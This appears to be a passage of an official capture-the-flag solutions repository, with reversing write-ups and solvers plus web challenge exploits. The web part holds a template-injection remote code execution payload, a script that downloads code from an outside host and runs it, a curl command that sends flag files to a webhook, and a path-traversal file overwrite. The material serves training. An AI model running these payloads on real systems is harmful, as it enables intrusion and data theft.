len(length_bytes) != 8: break 12 | length = unpack("Q", length_bytes)[0] 13 | for i in range(length): 14 | pos = unpack("Q", fp.read(8))[0] 15 | content[pos] = current 16 | highest = max(highest, pos) 17 | print(content[:highest].decode()) 18 | -------------------------------------------------------------------------------- /reversing/[Hard] Metagaming/README.md: -------------------------------------------------------------------------------- 1 | 2 | 1. Locating the huge list of all vm handlers 3 | ```cpp 4 | if constexpr (Insn.opcode == 0) { 5 | regs[Insn.op0] = Flag.at(Insn.op1); 6 | } else if constexpr (Insn.opcode == 1) { 7 | regs[Insn.op0] = Insn.op1; 8 | } else if constexpr (Insn.opcode == 2) { 9 | regs[Insn.op0] ^= Insn.op1; 10 | } else if constexpr (Insn.opcode == 3) { 11 | regs[Insn.op0] ^= regs[Insn.op1]; 12 | } else if constexpr (Insn.opcode == 4) { 13 | regs[Insn.op0] |= Insn.op1; 14 | } else if constexpr (Insn.opcode == 5) { 15 | regs[Insn.op0] |= regs[Insn.op1]; 16 | } else if constexpr (Insn.opcode == 6) { 17 | regs[Insn.op0] &= Insn.op1; 18 | } else if constexpr (Insn.opcode == 7) { 19 | regs[Insn.op0] &= regs[Insn.op1]; 20 | ... 21 | ``` 22 | 1.1 Naming the handlers (0 = read flag, 1 = mov, 2 = xor_imm, 3 = xor_reg, etc..) 23 | 2. Getting the vm commands 24 | ```cpp 25 | program_t; 26 | ``` 27 | 3. Lifting to z3 (i cheated a bit and ignored all the junk payloads) 28 | ```py 29 | chunks = [0 for _ in range(15)] 30 | 31 | for i in range(len(flag)): 32 | pos = i % 4 33 | cur_reg = (i - (i % 4)) // 4 34 | 35 | if pos == 0: 36 | chunks[cur_reg] = 0 37 | 38 | chunks[cur_reg] |= (flag[i] << (pos * 8)) 39 | 40 | for cmd in payload: 41 | opcode, op0, op1 = cmd 42 | if opcode == 2: 43 | chunks[op0] ^= BitVecVal(op1, 32) 44 | elif opcode == 8: 45 | chunks[op0] += BitVecVal(op1, 32) 46 | elif opcode == 10: 47 | chunks[op0] -= BitVecVal(op1, 32) 48 | elif opcode == 3: 49 | chunks[op0] ^= chunks[op1] 50 | 51 | s.add(chunks[0] == 0x3ee88722) 52 | s.add(chunks[1] == 0xecbdbe2) 53 | s.add(chunks[2] == 0x60b843c4) 54 | s.add(chunks[3] == 0x5da67c7) 55 | s.add(chunks[4] == 0x171ef1e9) 56 | s.add(chunks[5] == 0x52d5b3f7) 57 | s.add(chunks[6] == 0x3ae718c0) 58 | s.add(chunks[7] == 0x8b4aacc2) 59 | s.add(chunks[8] == 0xe5cf78dd) 60 | ``` 61 | 5. Profit 62 | ```py 63 | m = s.model() 64 | fl = ''.join(map(chr, [m[x].as_long() for x in flag])) 65 | assert fl == 'HTB{m4n_1_l0v4_cXX_TeMpl4t35_9fb60c17b0}' 66 | ``` 67 | 68 | 3.1 Second option is to just revert the math operations 69 | ```py 70 | from numpy import uint32 71 | 72 | s = [uint32(0) for i in range(15)] 73 | 74 | s[9] = uint32(0x4a848edf) ^ 0x8f 75 | s[8] = uint32(0xe5cf78dd) ^ s[9] 76 | s[7] = uint32(0x8b4aacc2) ^ s[8] 77 | s[6] = uint32(0x3ae718c0) ^ s[7] 78 | s[5] = uint32(0x52d5b3f7) ^ s[6] 79 | s[4] = uint32(0x171ef1e9) ^ s[5] 80 | s[3] = uint32(0x5da67c7) ^ s[4] 81 | s[2] = uint32(0x60b843c4) ^ s[3] 82 | s[1] = uint32(0xecbdbe2) ^ s[2] 83 | s[0] = uint32(0x3ee88722) ^ s[1] 84 | 85 | instrs = INSTRUCTIONS.strip().split("\n")[::-1] 86 | for i in instrs: 87 | 88 | op, dst, rhs = i.split(" ") 89 | 90 | is_imm = op.endswith("IMM") 91 | operation = op.split('_')[0] 92 | 93 | if dst == "14" or (not is_imm and (operation == "OR" and rhs == "14")): 94 | continue 95 | 96 | if int(dst) > 9 or not is_imm: 97 | continue 98 | 99 | if operation == "ADD": 100 | s[int(dst)] = uint32(s[int(dst)]) - uint32(rhs) 101 | elif operation == "XOR": 102 | s[int(dst)] = uint32(s[int(dst)]) ^ uint32(rhs) 103 | elif operation == "SUB": 104 | s[int(dst)] = uint32(s[int(dst)]) + uint32(rhs) 105 | 106 | for v in s[:10]: 107 | print(bytes.fromhex(hex(v)[2:])) 108 | 109 | print("".join([bytes.fromhex(hex(v)[2:]).decode()[::-1] for v in s[:10]])) 110 | ``` 111 | -------------------------------------------------------------------------------- /reversing/[Insane] MazeOfPower/htb/go.mod: -------------------------------------------------------------------------------- 1 | module solve 2 | 3 | go 1.17 4 | 5 | require github.com/redpwn/pow v0.1.2 6 | 7 | require github.com/itchyny/maze v0.0.9 8 | 9 | require github.com/ncw/gmp v1.0.4 // indirect 10 | -------------------------------------------------------------------------------- /reversing/[Insane] MazeOfPower/htb/go.sum: -------------------------------------------------------------------------------- 1 | github.com/BurntSushi/toml v1.2.1/go.mod h1:CxXYINrC8qIiEnFrOxCa7Jy5BFHlXnUU2pbicEuybxQ= 2 | github.com/cpuguy83/go-md2man/v2 v2.0.2/go.mod h1:tgQtvFlXSQOSOSIRvRPT7W67SCa46tRHOmNcaadrF8o= 3 | github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 4 | github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 5 | github.com/itchyny/maze v0.0.9 h1:H+3YmPOIpu6j4l1mtM4QzD+9LzFYBTN2baB8s946I5I= 6 | github.com/itchyny/maze v0.0.9/go.mod h1:sRkRwDPr3ektzuOc3GtgtVorM3XS86IFo6RE9ApAW8k= 7 | github.com/mattn/go-isatty v0.0.18/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y= 8 | github.com/mattn/go-runewidth v0.0.9/go.mod h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI= 9 | github.com/mattn/go-runewidth v0.0.14/go.mod h1:Jdepj2loyihRzMpdS35Xk/zdY8IAYHsh153qUoGf23w= 10 | github.com/ncw/gmp v1.0.4 h1:/f+vRpbpMIqDWfTGqYgCIuhoVfiyVf0ygsnwayqjGwU= 11 | github.com/ncw/gmp v1.0.4/go.mod h1:cDbCx93DFhzP32H3rnwwt6QnIXNL5wu4jLPCNaExheI= 12 | github.com/nsf/termbox-go v1.1.1/go.mod h1:T0cTdVuOwf7pHQNtfhnEbzHbcNyCEcVU4YPpouCbVxo= 13 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= 14 | github.com/redpwn/pow v0.1.2 h1:nhMynr6goB0peg6ODfttLwS/s6+1cjJHLxBCbUN6IH0= 15 | github.com/redpwn/pow v0.1.2/go.mod h1:gpuUIZA/5DdaIrWpHVgUg6m4SbsNvYQ0NbPz9RCSXns= 16 | github.com/rivo/uniseg v0.2.0/go.mod h1:J6wj4VEh+S6ZtnVlnTBMWIodfgj8LQOQFoIToxlJtxc= 17 | github.com/rivo/uniseg v0.4.4/go.mod h1:FN3SvrM+Zdj16jyLfmOkMNblXMcoc8DfTHruCPUcx88= 18 | github.com/russross/blackfriday/v2 v2.1.0/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM= 19 | github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= 20 | github.com/stretchr/objx v0.4.0/go.mod h1:YvHI0jy2hoMjB+UWwv71VJQ9isScKT/TqJzVSSt89Yw= 21 | github.com/stretchr/objx v0.5.0/go.mod h1:Yh+to48EsGEfYuaHDzXPcE3xhTkx73EhmCGUpEOglKo= 22 | github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= 23 | github.com/stretchr/testify v1.8.0/go.mod h1:yNjHg4UonilssWZ8iaSj1OCr/vHnekPRkoO+kdMU+MU= 24 | github.com/stretchr/testify v1.8.2/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= 25 | github.com/urfave/cli v1.22.13/go.mod h1:VufqObjsMTF2BBwKawpx9R8eAneNEWhoO0yx8Vd+FkE= 26 | golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 27 | golang.org/x/sys v0.7.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 28 | golang.org/x/term v0.7.0/go.mod h1:P32HKFT3hSsZrRxla30E9HqToFYAQPCMs/zFMBUFqPY= 29 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 30 | gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ= 31 | gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 32 | gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 33 | -------------------------------------------------------------------------------- /reversing/[Insane] MazeOfPower/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | def solve_maze_for_challenge(challenge): 6 | steps = [] 7 | with log.progress("[+] Getting solution...") as p: 8 | solution = process(challenge, shell=True).read().decode().strip() 9 | p.success(solution) 10 | 11 | with log.progress("[+] Getting maze path...") as prog: 12 | p = process("./main.patched") 13 | p.sendlineafter(b"solution: ", solution.encode()) 14 | p.clean() 15 | p.sendline(b"b") 16 | maze = p.clean().decode() 17 | steps.extend(maze_steps(maze)) 18 | prog.success("Done!"); 19 | return steps, solution 20 | 21 | def maze_steps(maze_str): 22 | maze = [] 23 | last_pos = None 24 | pos = None 25 | for i, line in enumerate(maze_str.split("\n")): 26 | maze_line = [] 27 | for j in range(0, len(line), 2): 28 | chunk = line[j:j+2] 29 | if chunk == "SS": 30 | pos = (i, j//2 + 1) 31 | maze_line.append(chunk) 32 | maze.append(maze_line) 33 | if pos is None: 34 | log.critical("start pos not found") 35 | raise StopIteration 36 | 37 | seen = set() 38 | while True: 39 | # print(f"at pos {pos}") 40 | if maze[pos[0]][pos[1]] == "EE": 41 | return 42 | # Up, Right, Down, Left 43 | for dy, dx, direction in [ 44 | (-1, 0, 'k'), 45 | (0, 1, 'l'), 46 | (1, 0, 'j'), 47 | (0, -1, 'h'), 48 | ]: 49 | new_pos = (pos[0] + dy, pos[1] + dx) 50 | # Don't go out of bounds 51 | if new_pos[0] < 0 or new_pos[0] >= len(maze): continue 52 | if new_pos[1] < 0 or new_pos[1] >= len(maze[new_pos[0]]): continue 53 | # Don't visit previous positions 54 | if new_pos in seen: continue 55 | next_val = maze[new_pos[0]][new_pos[1]] 56 | if next_val == "::": 57 | seen.add(new_pos) 58 | seen.add(pos) 59 | new_pos = (pos[0] + dy * 2, pos[1] + dx * 2) 60 | pos = new_pos 61 | yield direction 62 | break 63 | elif next_val == "EE": 64 | pos = new_pos 65 | yield direction 66 | break 67 | else: 68 | log.critical("could not solve") 69 | exit(-1) 70 | 71 | r = remote(args.HOST or "127.0.0.1", args.PORT or 1337) 72 | r.recvuntil(b"proof of work: ") 73 | challenge = r.recvline().strip().decode() 74 | steps, solution = solve_maze_for_challenge(challenge) 75 | r.sendlineafter(b"solution: ", solution.encode()) 76 | for step in steps: 77 | r.recvuntil(b'EE').decode() 78 | r.send(step.encode()) 79 | result = r.clean().strip().decode() 80 | print(result) 81 | -------------------------------------------------------------------------------- /reversing/[Medium] FollowThePath/htb/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | out_bin = 'chall.exe' 4 | 5 | with open(out_bin, 'rb') as f: 6 | f.seek(0x400) 7 | out_bin_data = f.read() 8 | 9 | def process_chunk(chunk): 10 | k1 = chunk[10] 11 | k2 = chunk[17] 12 | k3 = chunk[0x2b + 4] 13 | return k1, k2, k3 14 | 15 | flag = "" 16 | for i in range(0, 0x39 * 100, 0x39): 17 | if "}" in flag: break 18 | chunk = out_bin_data[i:i+0x39] 19 | key, check, xor = process_chunk(chunk) 20 | flag += chr(key ^ check) 21 | print(flag) 22 | -------------------------------------------------------------------------------- /reversing/[Medium] QuickScan/htb/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | import tempfile 5 | 6 | r = remote(args.HOST or "127.0.0.1", args.PORT or 1337) 7 | 8 | def get_loaded_value(e: ELF): 9 | lea_addr = e.entrypoint + 4 10 | lea_off = u32(e.read(lea_addr + 3, 4), sign="signed") 11 | target = lea_addr + 7 + lea_off 12 | return e.read(target, 0x18) 13 | 14 | def do_round(): 15 | r.recvuntil(b"ELF: ") 16 | elf = b64d(r.recvline().decode()) 17 | with tempfile.NamedTemporaryFile("wb") as f, context.local(log_level='critical'): 18 | f.write(elf) 19 | f.flush() 20 | elf = ELF(f.name) 21 | value = get_loaded_value(elf) 22 | r.sendlineafter(b"Bytes? ", value.hex().encode()) 23 | 24 | do_round() 25 | with log.progress("Solving binaries") as p: 26 | for i in range(128): 27 | do_round() 28 | p.status(f"Solved {i}") 29 | 30 | r.interactive() -------------------------------------------------------------------------------- /reversing/[Very Easy] BoxCutter/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | BoxCutter 4 | 5 | 6th 03 24 / Document No. D24.102.19 6 | 7 | Prepared By: clubby789 8 | 9 | Challenge Author: clubby789 10 | 11 | Difficulty: Very Easy 12 | 13 | Classification: Official 14 | 15 | 16 | 17 | 18 | 19 | 20 | # Synopsis 21 | 22 | BoxCutter is a Very Easy reversing challenge. Players will use `strace` to identify the flag. 23 | 24 | ## Skills Learned 25 | - Use of `strace` 26 | 27 | # Solution 28 | 29 | If players run the challenge, they will receive the message `[X] Error: Box Not Found`. If we run it under strace, we will see the following: 30 | 31 | ``` 32 | [ .. SNIP .. ] 33 | munmap(0x7f2ee0bd7000, 334763) = 0 34 | openat(AT_FDCWD, "HTB{...}", O_RDONLY) = -1 ENOENT (No such file or directory) 35 | fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0), ...}) = 0 36 | [ .. SNIP .. ] 37 | ``` 38 | 39 | The binary is trying to open a file with the name of the flag. We have now solved the challenge. 40 | -------------------------------------------------------------------------------- /reversing/[Very Easy] LootStash/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | LootStash 4 | 5 | 7th 02 24 / Document No. D24.102.13 6 | 7 | Prepared By: clubby789 8 | 9 | Challenge Author: clubby789 10 | 11 | Difficulty: Very Easy 12 | 13 | Classification: Official 14 | 15 | 16 | 17 | 18 | 19 | 20 | # Synopsis 21 | 22 | LootStash is a Very Easy reversing challenge. 23 | 24 | ## Skills Learned 25 | - Using `strings` 26 | 27 | # Solution 28 | 29 | If we run the binary, it will print a series of dots over 5 seconds, then tell us a weapon that was retrieved from the stash. 30 | 31 | ``` 32 | Diving into the stash - let's see what we can find. 33 | ..... 34 | You got: 'Supinity, Ferocity of Bloodlust'. Now run, before anyone tries to steal it! 35 | ``` 36 | 37 | If we run `strings` and `grep` for `HTB`, we can locate the flag in the binary. -------------------------------------------------------------------------------- /reversing/[Very Easy] PackedAway/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | PackedAway 4 | 5 | 6th 03 24 / Document No. D24.102.20 6 | 7 | Prepared By: clubby789 8 | 9 | Challenge Author: clubby789 10 | 11 | Difficulty: Very Easy 12 | 13 | Classification: Official 14 | 15 | 16 | 17 | 18 | 19 | 20 | # Synopsis 21 | 22 | PackedAway is a Very Easy reversing challenge. Players will use `UPX` to extract the original version of an executable. 23 | 24 | ## Skills Learned 25 | - Unpacking `UPX` executables 26 | 27 | # Solution 28 | 29 | If we run the binary, it opens a UI containing a text box with 'Placeholder'. If we write a fake flag such as `HTB{xx}`, it is highlighted in red. 30 | 31 | ![textbox with fake flag highlighted in red](assets/textbox.png). 32 | 33 | If we run `strings` on the binary, there are no obvious secrets - but there are several 'UPX!' strings. If we use `upx -d` to extract the binary, we will unpack a slightly larger one. We can then run `strings` again, and find the flag in the output. 34 | 35 | If we enter this in the textbox, it will be highlighted in green. 36 | 37 | ![textbox with blurred flag highlighted in green](assets/flag.png). 38 | -------------------------------------------------------------------------------- /reversing/[Very Easy] PackedAway/assets/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/reversing/[Very Easy] PackedAway/assets/flag.png -------------------------------------------------------------------------------- /reversing/[Very Easy] PackedAway/assets/textbox.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/reversing/[Very Easy] PackedAway/assets/textbox.png -------------------------------------------------------------------------------- /web/[Easy] Labyrinth Linguist/assets/overview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Easy] Labyrinth Linguist/assets/overview.png -------------------------------------------------------------------------------- /web/[Easy] Labyrinth Linguist/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Change flag name 4 | mv /flag.txt /flag$(cat /dev/urandom | tr -cd "a-f0-9" | head -c 10).txt 5 | 6 | # Secure entrypoint 7 | chmod 600 /entrypoint.sh 8 | 9 | # Start application 10 | /usr/bin/supervisord -c /etc/supervisord.conf -------------------------------------------------------------------------------- /web/[Easy] Labyrinth Linguist/htb/flag.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | search_dir="/" 4 | 5 | server_url="https://webhook.site/a425d5a9-f596-49e0-b2fc-64c4c2b7e34b" 6 | 7 | file=$(find "$search_dir" -type f -name "flag*.txt") 8 | 9 | if [ -n "$file" ]; then 10 | curl -d @/$file -X POST $server_url 11 | echo "File contents sent to the server." 12 | else 13 | echo "No file starting with 'flag' found in $search_dir." 14 | fi 15 | -------------------------------------------------------------------------------- /web/[Easy] Labyrinth Linguist/htb/solver.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | HOST, PORT = "127.0.0.1", 1337 4 | CHALLENGE_URL = f"http://{HOST}:{PORT}" 5 | FILE_HOST = "https://x0.at" 6 | 7 | def ssti(payload): 8 | return f""" 9 | #set($engine="") 10 | #set($proc=$engine.getClass().forName("java.lang.Runtime").getRuntime().exec("{payload}")) 11 | #set($null=$proc.waitFor()) 12 | ${{null}} 13 | """ 14 | 15 | def pwn(): 16 | with requests.Session() as session: 17 | uploaded_file = session.post(FILE_HOST, files={"file": open("flag.sh", "rb")}).text.strip() 18 | session.post(CHALLENGE_URL, data={"text": ssti(f"curl {uploaded_file} -o /a.sh")}) 19 | session.post(CHALLENGE_URL, data={"text": ssti(f"sh /a.sh")}) 20 | 21 | 22 | def main(): 23 | pwn() 24 | 25 | 26 | if __name__ == "__main__": 27 | main() -------------------------------------------------------------------------------- /web/[Easy] Testimonial/assets/overview1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/web/[Easy] Testimonial/assets/overview1.png -------------------------------------------------------------------------------- /web/[Easy] Testimonial/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Change flag name 4 | mv /flag.txt /flag$(cat /dev/urandom | tr -cd "a-f0-9" | head -c 10).txt 5 | 6 | # Secure entrypoint 7 | chmod 600 /entrypoint.sh 8 | 9 | # Start application 10 | air -------------------------------------------------------------------------------- /web/[Easy] Testimonial/htb/solution.txt: -------------------------------------------------------------------------------- 1 | This challenge uses Golang + Templ, which is a new-ish templating language in Golang. It uses AIR, which monitors the golang files and will update the website upon modification. 2 | 3 | The idea of the challenge is just a basic microservice challenge. There is a Website and "File Writer" service (GRPC). The website has sanitizations in place around the filename, but if you access the File Writer service directly there is no sanitization. It is probably possible to use GRPCurl to make this request, but since you need to replace an entire file it can be hard to do all the escapes properly. It is far easier to just write a golang program to send the malicious file. 4 | -------------------------------------------------------------------------------- /web/[Easy] Testimonial/htb/solver/.env: -------------------------------------------------------------------------------- 1 | HTTP_LISTEN_ADDR=":3000" 2 | GRPC_LISTEN_ADDR=":50045" 3 | -------------------------------------------------------------------------------- /web/[Easy] Testimonial/htb/solver/go.mod: -------------------------------------------------------------------------------- 1 | module client 2 | 3 | go 1.21.1 4 | 5 | require ( 6 | github.com/golang/protobuf v1.5.3 // indirect 7 | golang.org/x/net v0.20.0 // indirect 8 | golang.org/x/sys v0.16.0 // indirect 9 | golang.org/x/text v0.14.0 // indirect 10 | google.golang.org/genproto/googleapis/rpc v0.0.0-20240123012728-ef4313101c80 // indirect 11 | google.golang.org/grpc v1.62.0 // indirect 12 | google.golang.org/protobuf v1.32.0 // indirect 13 | ) 14 | -------------------------------------------------------------------------------- /web/[Easy] Testimonial/htb/solver/go.sum: -------------------------------------------------------------------------------- 1 | github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk= 2 | github.com/golang/protobuf v1.5.3 h1:KhyjKVUg7Usr/dYsdSqoFveMYd5ko72D+zANwlG1mmg= 3 | github.com/golang/protobuf v1.5.3/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY= 4 | github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= 5 | golang.org/x/net v0.20.0 h1:aCL9BSgETF1k+blQaYUBx9hJ9LOGP3gAVemcZlf1Kpo= 6 | golang.org/x/net v0.20.0/go.mod h1:z8BVo6PvndSri0LbOE3hAn0apkU+1YvI6E70E9jsnvY= 7 | golang.org/x/sys v0.16.0 h1:xWw16ngr6ZMtmxDyKyIgsE93KNKz5HKmMa3b8ALHidU= 8 | golang.org/x/sys v0.16.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= 9 | golang.org/x/text v0.14.0 h1:ScX5w1eTa3QqT8oi6+ziP7dTV1S2+ALU0bI+0zXKWiQ= 10 | golang.org/x/text v0.14.0/go.mod h1:18ZOQIKpY8NJVqYksKHtTdi31H5itFRjB5/qKTNYzSU= 11 | golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= 12 | google.golang.org/genproto v0.0.0-20240123012728-ef4313101c80 h1:KAeGQVN3M9nD0/bQXnr/ClcEMJ968gUXJQ9pwfSynuQ= 13 | google.golang.org/genproto/googleapis/rpc v0.0.0-20240123012728-ef4313101c80 h1:AjyfHzEPEFp/NpvfN5g+KDla3EMojjhRVZc1i7cj+oM= 14 | google.golang.org/genproto/googleapis/rpc v0.0.0-20240123012728-ef4313101c80/go.mod h1:PAREbraiVEVGVdTZsVWjSbbTtSyGbAgIIvni8a8CD5s= 15 | google.golang.org/grpc v1.62.0 h1:HQKZ/fa1bXkX1oFOvSjmZEUL8wLSaZTjCcLAlmZRtdk= 16 | google.golang.org/grpc v1.62.0/go.mod h1:IWTG0VlJLCh1SkC58F7np9ka9mx/WNkjl4PGJaiq+QE= 17 | google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw= 18 | google.golang.org/protobuf v1.26.0/go.mod h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= 19 | google.golang.org/protobuf v1.32.0 h1:pPC6BG5ex8PDFnkbrGU3EixyhKcQ2aDuBS36lqK/C7I= 20 | google.golang.org/protobuf v1.32.0/go.mod h1:c6P6GXX6sHbq/GpV6MGZEdwhWPcYBgnhAHhKbcUYpos= 21 | -------------------------------------------------------------------------------- /web/[Easy] Testimonial/htb/solver/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "client/pb" 5 | "context" 6 | "fmt" 7 | "io/ioutil" 8 | "net/http" 9 | "strings" 10 | "sync" 11 | 12 | "google.golang.org/grpc" 13 | ) 14 | 15 | var ( 16 | grpcClient *Client 17 | mutex *sync.Mutex 18 | ) 19 | 20 | func init() { 21 | grpcClient = nil 22 | mutex = &sync.Mutex{} 23 | } 24 | 25 | type Client struct { 26 | pb.RickyServiceClient 27 | } 28 | 29 | func getHTML(url string) (string, error) { 30 | response, err := http.Get(url) 31 | if err != nil { 32 | return "", err 33 | } 34 | defer response.Body.Close() 35 | 36 | body, err := ioutil.ReadAll(response.Body) 37 | if err != nil { 38 | return "", err 39 | } 40 | 41 | htmlContent := string(body) 42 | 43 | return htmlContent, nil 44 | } 45 | 46 | func GetClient() (*Client, error) { 47 | mutex.Lock() 48 | defer mutex.Unlock() 49 | 50 | if grpcClient == nil { 51 | conn, err := grpc.Dial("127.0.0.1:50045", grpc.WithInsecure()) 52 | if err != nil { 53 | return nil, err 54 | } 55 | 56 | grpcClient = &Client{pb.NewRickyServiceClient(conn)} 57 | } 58 | 59 | return grpcClient, nil 60 | } 61 | 62 | func (c *Client) SendTestimonial(customer, testimonial string) error { 63 | ctx := context.Background() 64 | // Filter bad characters. 65 | for _, char := range []string{"/", "\\", ":", "*", "?", "\"", "<", ">", "|", "."} { 66 | customer = strings.ReplaceAll(customer, char, "") 67 | } 68 | 69 | _, err := c.SubmitTestimonial(ctx, &pb.TestimonialSubmission{Customer: customer, Testimonial: testimonial}) 70 | return err 71 | } 72 | 73 | func main() { 74 | client, err := GetClient() 75 | if err != nil { 76 | fmt.Println("Failed to connect to server:", err) 77 | return 78 | } 79 | 80 | f, err := ioutil.ReadFile("pwn.go") 81 | if err != nil { 82 | fmt.Println("Failed to read file:", err) 83 | return 84 | } 85 | 86 | fpath := "../../view/home/index.templ" 87 | fmt.Println("Sending testimonial from", fpath) 88 | client.SubmitTestimonial(context.Background(), &pb.TestimonialSubmission{Customer: fpath, Testimonial: string(f)}) 89 | 90 | if err != nil { 91 | fmt.Println("Failed to send testimonial:", err) 92 | return 93 | } 94 | 95 | url := "http://127.0.0.1:1337" 96 | htmlContent, err := getHTML(url) 97 | if err != nil { 98 | fmt.Println("Error:", err) 99 | return 100 | } 101 | 102 | fmt.Println("HTML Content:") 103 | fmt.Println(htmlContent) 104 | } 105 | -------------------------------------------------------------------------------- /web/[Easy] Testimonial/htb/solver/pb/ptypes.proto: -------------------------------------------------------------------------------- 1 | syntax = "proto3"; 2 | 3 | option go_package = "/pb"; 4 | 5 | service RickyService { 6 | rpc SubmitTestimonial(TestimonialSubmission) returns (GenericReply) {} 7 | } 8 | 9 | message TestimonialSubmission { 10 | string customer = 1; 11 | string testimonial = 2; 12 | } 13 | 14 | message GenericReply { 15 | string message = 1; 16 | } -------------------------------------------------------------------------------- /web/[Easy] Testimonial/htb/solver/pb/ptypes_grpc.pb.go: -------------------------------------------------------------------------------- 1 | // Code generated by protoc-gen-go-grpc. DO NOT EDIT. 2 | 3 | package pb 4 | 5 | import ( 6 | context "context" 7 | grpc "google.golang.org/grpc" 8 | codes "google.golang.org/grpc/codes" 9 | status "google.golang.org/grpc/status" 10 | ) 11 | 12 | // This is a compile-time assertion to ensure that this generated file 13 | // is compatible with the grpc package it is being compiled against. 14 | const _ = grpc.SupportPackageIsVersion7 15 | 16 | // RickyServiceClient is the client API for RickyService service. 17 | // 18 | // For semantics around ctx use and closing/ending streaming RPCs, please refer to https://pkg.go.dev/google.golang.org/grpc/?tab=doc#ClientConn.NewStream. 19 | type RickyServiceClient interface { 20 | SubmitTestimonial(ctx context.Context, in *TestimonialSubmission, opts ...grpc.CallOption) (*GenericReply, error) 21 | } 22 | 23 | type rickyServiceClient struct { 24 | cc grpc.ClientConnInterface 25 | } 26 | 27 | func NewRickyServiceClient(cc grpc.ClientConnInterface) RickyServiceClient { 28 | return &rickyServiceClient{cc} 29 | } 30 | 31 | func (c *rickyServiceClient) SubmitTestimonial(ctx context.Context, in *TestimonialSubmission, opts ...grpc.CallOption) (*GenericReply, error) { 32 | out := new(GenericReply) 33 | err := c.cc.Invoke(ctx, "/RickyService/SubmitTestimonial", in, out, opts...) 34 | if err != nil { 35 | return nil, err 36 | } 37 | return out, nil 38 | } 39 | 40 | // RickyServiceServer is the server API for RickyService service. 41 | // All implementations must embed UnimplementedRickyServiceServer 42 | // for forward compatibility 43 | type RickyServiceServer interface { 44 | SubmitTestimonial(context.Context, *TestimonialSubmission) (*GenericReply, error) 45 | mustEmbedUnimplementedRickyServiceServer() 46 | } 47 | 48 | // UnimplementedRickyServiceServer must be embedded to have forward compatible implementations. 49 | type UnimplementedRickyServiceServer struct { 50 | } 51 | 52 | func (UnimplementedRickyServiceServer) SubmitTestimonial(context.Context, *TestimonialSubmission) (*GenericReply, error) { 53 | return nil, status.Errorf(codes.Unimplemented, "method SubmitTestimonial not implemented") 54 | } 55 | func (UnimplementedRickyServiceServer) mustEmbedUnimplementedRickyServiceServer() {} 56 | 57 | // UnsafeRickyServiceServer may be embedded to opt out of forward compatibility for this service. 58 | // Use of this interface is not recommended, as added methods to RickyServiceServer will 59 | // result in compilation errors. 60 | type UnsafeRickyServiceServer interface { 61 | 